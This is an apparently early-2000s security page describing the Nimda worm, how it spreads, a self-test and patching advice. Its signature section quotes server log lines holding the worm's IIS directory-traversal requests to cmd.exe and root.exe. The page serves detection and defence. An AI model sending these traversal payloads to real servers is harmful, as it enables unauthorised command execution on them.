Nimda Self Test
What is the Nimda Worm? |
|
The Nimda worm, also known as W32.Nimda.A@mm, Code Rainbow, Minda, Nimbda,
is a self-replicating piece of software that infects
IIS web servers as well as users running Internet Explorer 5. It was first
seen in the wild on Tuesday, Sept 18th at around 9a.m. The worm propogates
in at least 4 different manners, including:
- Attempts to exploit numerous different IIS exploits, including
the Unicode exploit and infections by previous worms (SAdminD/Code Red II),
and on infection, begins a new attack cycle.
- Modification of web pages on a web server, which when viewed by
IE 5.0, will cause IE to execute malicious code which infects a user's
system. Note - the user does not need to be running IIS.
- Harvesting of mail addresses in address books and cached web server pages
on user systems that become infected, delivering infected attachments
to other users that will automatically execute if opened.
- Propagation via file sharing on shares accessible via user guest and
where no password has been set.
This worm is reported to be extremely aggressive in its scans,
and according to various alerts is spreading rapidly.
Signature |
|
The Worm checks systems for a number of different possible entry points.
The following log file extract is from an Apache system that is being
actively scanned by other sites:
"GET /scripts/root.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 209 - - - "-" "-"
Test Me Now |
|
If you are running your browser from the same system running your web server,
simply click the following button to determine if your web server
susceptible or has been exploited by the Nimda Worm.
How Do I Stop It? |
|
We recommend that users take the steps of upgrading their versions of
IIS to the latest, ensuring that they apply all security patches.
Users of Internet Explorer should also take care to update their browsers.
References |
|
Incidents.org
TruSecure
Symantec
Newsbytes
F-Secure
Sophos